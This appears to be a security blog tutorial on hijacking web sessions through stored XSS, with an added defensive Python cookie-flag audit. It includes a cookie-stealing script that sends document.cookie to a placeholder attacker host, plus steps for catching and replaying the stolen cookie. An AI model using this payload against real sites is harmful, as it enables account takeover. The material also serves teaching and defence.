
Session Hijacking


Session Hijacking in XSS to MYSQL File


Hi, after a long time I am back with a new post on how someone's session can be hijacked.
Sounds interesting. Is it possible to hijack or steal someone's cookie or session? Yes, it is possible, and I am going to explain how.

First of all, this is a web application vulnerability. In the OWASP Top 10, A-2 Broken Authentication and Session Management covers the session management issues:

(1) Session sniffing
(2) Session fixation
(3) Session hijacking

First, for non-technical readers: what is a session, and what is a cookie?

A session can be defined as a server-side storage of information that is desired to persist throughout the user's interaction with the web site or web application. 

A cookie is a small piece of text stored on a user's computer by their browser. Common uses for cookies are authentication, storing of site preferences,  and server session identification.

Now, how am I able to steal someone's session?

If the web application is vulnerable to XSS (cross-site scripting), which is also an OWASP Top 10 vulnerability (A-3 Cross Site Scripting (XSS)), we can steal someone's session or cookie using an XSS session-ID stealing script. There is one condition: the cookie must not have the HttpOnly flag set. If the cookie has the HttpOnly flag, we cannot steal the session ID unless the TRACE method is enabled on the server. If the TRACE method is enabled and the cookie is set to HttpOnly, there is a vulnerability called XST (Cross Site Tracing), through which we can also steal a cookie that has the HttpOnly flag. XSS is a client-side attack; that is why it affects your browser.
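
The HttpOnly and TRACE conditions described above can be checked from the defender's side. The following is an added example, not part of the original post: it audits Set-Cookie headers for session cookies missing HttpOnly or Secure and checks an Allow header for TRACE. The cookie names treated as session identifiers and all header values are constructed assumptions.

```python
# Added example: audit cookie flags and TRACE exposure from response headers.
# All header values below are constructed samples, not captured traffic.

def parse_set_cookie(header):
    """Split one Set-Cookie value into (name, set of lowercase attribute names)."""
    parts = [p.strip() for p in header.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {p.split("=", 1)[0].strip().lower() for p in parts[1:] if p}
    return name, attrs

# Assumption: these names identify session cookies; adjust to the application.
SESSION_NAMES = ("phpsessid", "jsessionid", "sessionid", "sid")

def audit_cookies(set_cookie_headers, session_names=SESSION_NAMES):
    """Return findings for session cookies that script or a sniffer could read."""
    findings = []
    for header in set_cookie_headers:
        name, attrs = parse_set_cookie(header)
        if name.lower() not in session_names:
            continue  # only session identifiers matter for hijacking
        if "httponly" not in attrs:
            findings.append((name, "missing HttpOnly: readable via document.cookie"))
        if "secure" not in attrs:
            findings.append((name, "missing Secure: sent over plain HTTP"))
    return findings

def trace_enabled(allow_header):
    """True if the Allow header of an OPTIONS response lists TRACE (XST risk)."""
    methods = {m.strip().upper() for m in allow_header.split(",")}
    return "TRACE" in methods

# Constructed sample responses
WEAK = ["PHPSESSID=abc123; path=/", "theme=dark; path=/"]
HARDENED = ["PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax"]

if __name__ == "__main__":
    for label, headers in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit_cookies(headers))
    print("TRACE enabled:", trace_enabled("GET, HEAD, POST, OPTIONS, TRACE"))
```

An Allow header only reports what the server advertises, so confirm TRACE is actually rejected in the server configuration as well.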

The next step is a MITM (man-in-the-middle) attack; we can also sniff the traffic of the victim's machine, etc.


I am going to demonstrate using an XSS (cross-site scripting) session-ID stealing script. In my demo web application, the application is vulnerable to stored XSS.

<script>document.write('<img src="http://attacker-ip/website:port-no/?'+document.cookie+'"/>');</script>
 
When this script executes in the web application, it sends the victim's cookie to the attacker's IP address or domain name, where the port is listening.

I used nc (netcat) to capture the victim's cookie, with port 1234 listening.

After capturing the cookie, I used a Firefox add-on (Web Developer) to set the victim's session ID and refreshed the page.

See the full tutorial in the video below.



I am able to view the victim's session. :) :) :) :)

Thanks for watching the video and reading this.

For any queries, kindly post your comments. :)


